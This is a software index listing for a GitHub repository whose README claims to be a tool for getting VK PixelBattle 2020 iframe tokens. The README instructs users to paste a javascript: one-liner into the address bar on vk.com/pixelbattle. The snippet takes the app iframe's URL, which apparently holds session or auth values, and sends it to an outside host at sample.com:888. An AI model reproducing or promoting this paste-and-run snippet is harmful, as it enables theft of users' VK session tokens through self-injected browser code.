An open API service indexing awesome lists of open source software.

https://github.com/feeeek/vkpixelbattle2020

tool for getting vk pixelbattle 2020 iframe tokens
https://github.com/feeeek/vkpixelbattle2020

Last synced: 11 months ago
JSON representation

tool for getting vk pixelbattle 2020 iframe tokens

Awesome Lists containing this project

README

          

# vkpixelbattle2020
Tool for getting vk pixelbattle 2020 iframe tokens

1. Go to https://vk.com/pixelbattle
2. Past code to url bar
3. Enjoy

# Code:
```javascript
javascript:window.location.href.includes("vk.com/pixelbattle") ? window.location.replace("http://sample.com:888?code=" + document.querySelector("#app_7148888_container iframe").src) : alert("use this on vk.com/pixelbattle !!!");
```